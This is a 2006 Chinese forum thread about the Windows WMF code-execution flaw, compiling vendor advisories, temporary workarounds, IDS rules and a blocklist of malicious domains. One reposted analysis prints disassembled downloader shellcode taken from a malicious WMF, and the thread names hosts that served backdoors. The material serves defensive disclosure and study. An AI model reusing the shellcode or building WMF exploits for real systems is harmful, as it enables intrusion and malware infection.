bbs.ebnew

标题: 新出现的木马,谁有安全漏洞补丁的消息? [打印本页]

作者: 小P 时间: 2006-1-11 12:35
标题: 新出现的木马,谁有安全漏洞补丁的消息?
Windows对WMF处理方式有缺陷，据微软的安全公告称，它计划在1月10日发布针对该缺陷的补丁软件。

谁有最新安全漏洞补丁的消息请告知，谢谢。

下附一些查到的资料，不熟悉操作系统的请咨询技术支持人员后再尝试：
一、漏洞报道：
　　据数家互联网安全厂商称，本周三，一种新的特洛伊木马病毒开始感染PC。它会利用Windows 系统中的一个缺陷入侵计算机，然后下载广告件或间谍件，或者使被感染的计算机成为僵尸。

　　赛门铁克安全响应中心的主任科尔表示，被称为Exploit-WMF (Windows 元数据文件)的该特洛伊木马病毒的危险等级被评定为2，这意味着它可能会继续传播。

　　他说，Exploit-WMF 滥用了Windows 操作系统WMF 库文件中的一个函数，在计算机上下载一个特洛伊木马病毒，该病毒又可以从互联网上的一台服务器上下载更复杂的特洛伊木马病毒。

　　然后，它会试图下载广告件、间谍件、bot 软件，使被感染计算机成为黑客攻击其它计算机或发送垃圾邮件的帮凶，或者仅仅在计算机上留下一个后门儿，供黑客窃取机密数据用。

　　卡巴斯基实验室将该缺陷评定为“高度危急”，并预测在不太远的未来会出现这些恶意软件的修改版。WMF 缺陷影响运行Windows XP SP1和Windows XP SP2，以及Windows Server 2003 SP1 的计算机。

　　在某些情况下，当IE、Firefox 用户访问托管有恶意软件的网站，或利用Windows Explorer预览.wmf 格式的文件时，用户就会受到攻击。

　　微软的一名发言人在一封电子邮件中写道，微软正在对有关新缺陷的报告进行调查，并向客户提供更多的帮助。一旦调查完成后，微软将采取恰当的措施保护我们的客户，其中包括根据客户的需求发布补丁软件或安全公告。

二、目前的一些解决办法：
微软已经针对最近的WMF漏洞可能引起的攻击问题发布了一份安全咨询公告，微软称在对此漏洞进行全面的研究并发布安全补丁之前REGSVR32是一个可行的解决方案。

　　反注册Windows Picture和Fax Viewer的DLL文件Shimgvw.dll步骤如下：

　　1.在运行中输入"regsvr32 -u %windir%/system32/shimgvw.dll"（不包括引号）后回车确定。

　　2. 一个对话框会显示出来确认反注册工作已经成功，点击OK关闭对话框即可。

　　使用了上述的临时解决方法后，在用户点击一个和Windows Picture和Fax Viewer关联的图片时Windows Picture和Fax Viewer就不会再运行了。如果想取消上述的工作，重新注册一下Shimgvw.dll文件就可以了，重复上面操作的第一步输入"regsvr32 %windir%/system32/shimgvw.dll"就能完成Shimgvw.dll文件的注册工作。

　　安全网站F-Secure的安全专家认为这个方法比单纯的过滤掉WMF内容更加安全可靠，因为有太多类型的图形格式文件(.GIF, .BMP, .JPG, .TIF, etc...)也可能利用这个漏洞。F-Secure发出警告说他们现在已经发现利用此漏洞的木马程序和病毒，更多类型的木马程序和病毒也许很快就会出现。

AVERT Threat Advisory: New Exploit-WMF code posted and being spammed
Advisory
AVERT is releasing this advisory to make our customers aware of new Exploit-WMF code having been released today and currently being used in spam attacks resulting in the installation of a new Backdoor-CEP variant.

Justification
Updated DAT files to detect new Exploit-WMF and Backdoor-CEP variants are being prepared now and will be released shortly.

Read About It
Information about Exploit-WMF is located on VIL at: vil.nai.com/vil/content/v_125294.htm

Detection
New Exploit-WMF and Backdoor-CEP variants have been discovered on 1/1/2006 (GMT) and detection will be added to the 4664 dat files (Release Date: 1/1/2006). The EXTRA.DAT is available at https://www.webimmune.net/extra/getextra.aspx.

If you suspect you have Exploit-WMF or Backdoor-CEP, please submit samples to http://www.webimmune.net.

Risk Assessment Definition
For further information on the Risk Assessment and AVERT Recommended Actions please see:
http://www.mcafeesecurity.com/us ... risk_assessment.htm

Best Regards,

McAfee AVERT - Anti Virus and Vulnerability Research, Analysis, and
Solutions visit us at www.avertlabs.com

本人观点：咖啡的溢出保护打开可以暂时对付一下的~~~
参考链接
http://vil.nai.com/vil/content/v_137760.htm

注意】Microsoft Windows WMF Handling Arbitrary Code Execution漏洞注意事项+增补

关于Microsoft Windows WMF Handling Arbitrary Code Execution漏洞的注意事项
因为微软还没有发布正式补丁，现在有以下临时方法。

解决方法：
1.反注册shimgvw.dll 文件
复制以下文字到“开始——运行”里面，

regsvr32 /u shimgvw.dll

然后运行。推荐重新启动系统。
缺点就是无法预览图片。

2.改变文件关联
打开“我的文档”，“工具——文件夹选项——文件类型”选中wmf文件，点“更改”，选择“记事本”，并记得选中“始终使用选择的程序打开这种文件”，然后确定。
此后wmf文件将会默认用txt打开。但是这种方法比第1种要弱些。

3.运行IESPYAD
IESpyad 是一个免费工具可以阻拦ie浏览器中受限制站点列表中的网站. 这个工具是Sunbelt公司的顾问Eric Howes先生制作的。
IE-Spyad提供了上千个受限制网站的URL，这些网站中可能带有危险的代码，你仍然可以看这些网站中的内容，但可能有害的程序会被过滤掉。该网站提供了两个版本的工具：IE-Spyad和IE-Spyad 2，其中IE-Spyad只对Windows的当前账户有效，而IE-Spyad 2可以对该计算机上的所有用户有效。当然你需要使用administrator账户来安装IE-Spyad 2。

下面下载：
IE-SPYAD原版
https://netfiles.uiuc.edu/ehowes/www/res/ie-spyad.exe

IE-SPYAD 2

https://netfiles.uiuc.edu/ehowes/www/res/ie-spyad2.exe

最新的reg文件
http://www.dslreports.com/r0/dow ... /iespyad_051228.zip

使用方法：双击IESPYAD_051228.REG文件（此文件前天已经升级，包括了最新的使用wmf漏洞的含有恶意代码的站点），windows会询问是否导入注册表，点“确定”即可。

此程序相关网页，英文好的可以去看看：
http://www.dslreports.com/forum/remark,15121689

IESPYAD_ZO" target="_blank">https://netfiles.uiuc.edu/ehowes/www/resource.htm#IESPYAD_ZO

不要浏览以下站点。[dot]代表“.”
toolbarbiz[dot]biz
toolbarsite[dot]biz
toolbartraff[dot]biz
toolbarurl[dot]biz
buytoolbar[dot]biz
buytraff[dot]biz
iframebiz[dot]biz
iframecash[dot]biz
iframesite[dot]biz
iframetraff[dot]biz
iframeurl[dot]biz
cra*kz [dot] ws
unionseek [dot] com
www[dot]tfcco [dot] com
Iframeurl [dot] biz
beehappyy [dot] biz

转贴注明出自FF

+ADD增加：

即使你按照微软建议的那种方法（反注册shimgvw.dll 文件）做了，仍然有危险。因为如果你用windows里面的“画图（mspaint.exe）”打开一个利用此漏洞的wmf文件，并且令存为其他扩展名的图片格式，而这对于“画图”来说是没有区别的。
这是什么意思呢？也就是说如果你用“画图”打开一个后缀名为gif，jpg等后缀的图片，而此图片正是用利用此漏洞的wmf文件另存的，那么你仍然会受到攻击。
F-secure给出的建议是在微软的补丁没有发布之前不要用“画图”（mspaint.exe）打开任何格式的可疑的图片。

有兴趣和能力的可以尝试。

cyberarmy和tkabc版主已经说过开启DEP——数据执行保护，可以防止此漏洞利用。

现在KL Analysiser进一步实验表明，如果用第三方图片察看软件，比如Irfanview 和 XnView，即使开启HW DEP（基于硬件的数据执行保护），此漏洞仍然可以起作用。这是因为Irfanview 和 XnView都是用ASPack加壳的，而windows对于ASPack加壳的程序HW DEP是被禁用的。这样的话，即使用HW DEP，也仍然不是一个终极的解决方法。

还有个问题是：NTFS的权限对于漏洞是否被利用根本没有作用。有些人使用受限用户，觉得这样可以防止恶意程序，然而现在这样的想法也不可靠，因为已经有攻击者意识到此问题，并且可以使下载的程序在一个特定的受限用户有权限的路径执行。

虽然win2000目前没有受到影响，但是也是存在潜在的可能性的。如果win2000系统安装的图片察看软件支持wmf文件，那么此系统很有可能受到影响。此实验表明在安装了Irfanview 和 XnView的打全了sp4和最新补丁的win2000上此漏洞利用成功。关键的是现在已经有很多危险站点使用了此恶意代码的wmf文件。还好的是IE会询问是否下载wmf文件，而不是默认打开它。

winXP64 也仍然易受到攻击。因为黑客可能给64bitXP另写漏洞利用程序。XP64发生的可能性小的原因很大程度上是因为XP64用户不多。

12.31.2005

还有一些方法

4. McAfee VirusScan Enterprise 8.0i的用户,开启Buffer Overflow Protection(溢出保护)可以阻挡这类WMF Exploit的攻击

5. Kaspersky Internet Security/Kaspersky Anti-Virus 2006的用户,最好升级到 Build 253 版本,并开启Proactive Defense,可以阻挡这类WMF Exploit的攻击

6. AMD Athlon64 用户,确保你已经装上Windows XP Service Pack 2,并开启了DEP(Data Execution Protection),就可以阻挡这类WMF Exploit的攻击

7. Tiny Personal Firewall 2005 Professional的用户,可以换上附件中的IDS Signatures,就可以防止WMF Exploit经过网络到你的电脑.这个IDS Signatures是由本人昨晚用
Sourcefire VRT Certified Rules - The Official Snort Ruleset (registered user 2005-12-14 release) + Bleeding Edge 上的WMF Exploit Sig. rev 1.3 ,再用SnortImp转出来的

如何换上新的IDS Signatures,并设置防止WMF Exploit经过网络到你的电脑:
a) 用附件中的IDS.xml取代X:\Program Files\Tiny Firewall Pro\PolicyTable\10\srv中的IDS.xml
重新启动你的电脑
c) 开启Tiny的Administration Center ----> "IDS & IPS" ---->"IDS & IPS rules"
d) 右手面选exploit.rules,找出
bleeding-edge exploit wmf escape record exploit
和
bleeding-edge current wmf exploit
e) 两个项目的Access 都由Monitor 改做Prevent

8. IDA Pro的作者Ilfak Guilfanov写了一个非官方临时补丁
http://www.hexblog.com/security/files/wmffix_hexblog13.exe

Technical details: this is a DLL which gets injected to all processes loading user32.dll.
It patches the Escape() function in gdi32.dll. The result of the patch is that the SETABORT escape sequence is not accepted anymore.

作者建议当Microsoft 发布官方补丁后,移除这个临时补丁,装上官方补丁

2/1/2006:
Added the unoffical patch

【原创】关于恶意WMF文件分析报告-12月31日，晚7点20分更新

由于涉及到一些问题，解密密匙不便公开，但是还原文件代码以后，如下地址

00401198 > 64:8B01 mov eax,dword ptr fs:[ecx]
0040119B 40 inc eax
0040119C 93 xchg eax,ebx
0040119D 8B43 FF mov eax,dword ptr ds:[ebx-1]
004011A0 40 inc eax
004011A1 ^ 75 F9 jnz short eeee.0040119C
004011A3 8B5B 03 mov ebx,dword ptr ds:[ebx+3]
004011A6 66:93 xchg ax,bx
004011A8 66:813B 4D5A cmp word ptr ds:[ebx],5A4D ///比较MZP，猜测是搜索KERNEL32.DLL里面的地址，用做下面的API调用
004011AD 74 08 je short eeee.004011B7
004011AF 81EB 00100000 sub ebx,1000 // //4K4K的减，以搜索MZP
004011B5 ^ EB F1 jmp short eeee.004011A8
004011B7 8BFC mov edi,esp
004011B9 B1 04 mov cl,4
004011BB AD lods dword ptr ds:[esi]
004011BC E8 54000000 call eeee.00401215
004011C1 50 push eax
004011C2 ^ E2 F7 loopd short eeee.004011BB
004011C4 68 07800000 push 8007
004011C9 FF57 F8 call dword ptr ds:[edi-8] //调用API
004011CC 68 6F6E0000 push 6E6F
004011D1 68 75726C6D push 6D6C7275
004011D6 54 push esp
004011D7 FF57 FC call dword ptr ds:[edi-4] //调用API
004011DA 93 xchg eax,ebx
004011DB AD lods dword ptr ds:[esi]
004011DC E8 34000000 call eeee.00401215
004011E1 8D8E C2000000 lea ecx,dword ptr ds:[esi+C2]
004011E7 33F6 xor esi,esi
004011E9 68 746D7000 push 706D74
004011EE 68 3430392E push 2E393034
004011F3 68 57524630 push 30465257
004011F8 68 433A5C7E push 7E5C3A43
004011FD 8BEC mov ebp,esp
004011FF 56 push esi
00401200 56 push esi
00401201 55 push ebp
00401202 51 push ecx
00401203 56 push esi
00401204 FFD0 call eax //调用API，执行下载文件的功能
00401206 0BC0 or eax,eax
00401208 75 06 jnz short eeee.00401210
0040120A 6A 00 push 0
0040120C 55 push ebp
0040120D FF57 F0 call dword ptr ds:[edi-10] //调用API
00401210 6A 00 push 0
00401212 FF57 F4 call dword ptr ds:[edi-C] //调用API ExitProcess用来关闭EXPLORER进程
00401215 51 push ecx
00401216 56 push esi
00401217 95 xchg eax,ebp
00401218 8B4B 3C mov ecx,dword ptr ds:[ebx+3C]
0040121B 8B4C0B 78 mov ecx,dword ptr ds:[ebx+ecx+78]
0040121F 03CB add ecx,ebx
00401221 33F6 xor esi,esi
00401223 8D14B3 lea edx,dword ptr ds:[ebx+esi*4]
00401226 0351 20 add edx,dword ptr ds:[ecx+20]
00401229 8B12 mov edx,dword ptr ds:[edx]
0040122B 03D3 add edx,ebx
0040122D 33C0 xor eax,eax
0040122F C1C0 07 rol eax,7
00401232 3202 xor al,byte ptr ds:[edx]
00401234 42 inc edx
00401235 803A 00 cmp byte ptr ds:[edx],0
00401238 ^ 75 F5 jnz short eeee.0040122F
0040123A 3BC5 cmp eax,ebp
0040123C 74 06 je short eeee.00401244
0040123E 46 inc esi
0040123F 3B71 18 cmp esi,dword ptr ds:[ecx+18]
00401242 ^ 72 DF jb short eeee.00401223
00401244 8B51 24 mov edx,dword ptr ds:[ecx+24]
00401247 03D3 add edx,ebx
00401249 0FB71472 movzx edx,word ptr ds:[edx+esi*2]
0040124D 8B41 1C mov eax,dword ptr ds:[ecx+1C]
00401250 03C3 add eax,ebx
00401252 8B0490 mov eax,dword ptr ds:[eax+edx*4]
00401255 03C3 add eax,ebx
00401257 5E pop esi
00401258 59 pop ecx
00401259 C3 retn

其中包含文件下载地址是从文件偏移2C7处开始解密(我有的文件是从此处开始的），具体密匙也不方便公开。

大家凑合看吧。。。再详细的分析报告偶也写不出来了。。。。

12-30日，更新。。今天详细又看了下，现在贴出来的这个只对应一个文件，并不适用所有文件，而且这个样本并不是导致EXPLORER进程溢出，而是还原病毒代码以后，病毒代码执行了EXITPROCESS函数，关闭了EXPLORER的进程，所以大家会看到那样的现象。

12月31日，今天已经确定这个是MICROSOFT自己的问题，并不是什么溢出攻击
先从WMF文件格式说起，我就简单的说下。WMF文件其实记录的就是图形文件渲染的每个步骤，文件包含很多OBJECT，每个OBJECT可以理解为渲染图形的一步，而GDI32.DLL调用WMF时，就会按照每个OBJECT的结构来渲染图形，当这个WMF文件包含回调函数时，GDI32.DLL同样会执行这个结构代码，这个结构代码就被人利用了，写成了病毒代码。

同样，自己也可以构造一个可以执行代码的WMF文件，而且还发现AVP根本查不到。。。汗。。。。

好了，到此为止，这个话题就讨论到这里了，有兴趣的朋友，可以到很多安全网站有更详细的介绍

哎。。简直就是防不胜防。。。。MICROSOFT，让我欢喜让我忧！！

【转帖】不出所料——wmf漏洞利用继续扩大！

不出所料：

此漏洞已经通过LJ邮件和即时通讯软件流行，并且都是打这jpg的幌子。
已发现一个名为“Happy New Year”的LJ邮件包含图片"picture of 2006"并且包括一个含有利用wmf漏洞的附件，名为"HappyNewYear.jpg" (MD5: DBB27F839C8491E57EBCC9445BABB755). F-secure命名为PFV-Exploit.D。当HappyNewYear.jpg下载到硬盘时，当打开此文件或者预览次文件或者用google桌面搜索，此文件将执行，并从xxx.ritztours.com下载一个Bifrose后门，F-secure检测为 Backdoor.Win32.Bifrose.kt。请在防火墙中过滤此地址。

恐怖!

首个利用wmf漏洞的即时通讯蠕虫出现在荷兰，利用msn发送一个地址"http://*****/xmas-2006 FUNNY.jpg"，很有可能流行，但是目前还没有扩大。这个jpg实际上是一个html页面，其中含有利用wmf漏洞的恶意代码，Kaspersky Anti-Virus检测为Exploit.Win32.IMG-WMF。这个wmf文件下载一个vbs文件，Kaspersky Anti-Virus检测为Trojan-Downloader.VBS.Psyme.br，然后下载一个Sdbot，这个IRCBot被 Kaspersky Anti-Virus检测为Backdoor.Win32.SdBot.gen，然后此IRCBot下载一个IM-Worm.Win32.Kelvir变种，而Kelvir正是通过MSN传播的。看来此IRCBot极有可能是用以网络犯罪。

许多站点认为shimgvw.dll是缺陷文件，其实这个观点不正确，现在看来不对，因为很有可能在一个反注册了shimgvw.dll文件的系统上漏洞利用成功。缺陷文件看起来应该是gdi32.dll。只是反注册shimgvw.dll让系统稍微安全些。

新年里，请小心图片文件!

本文不代表本人观点，本人只是整理KL和FL的观点。
作者：moonforest

欢迎光临 bbs.ebnew (http://bbs.ebnew.com/)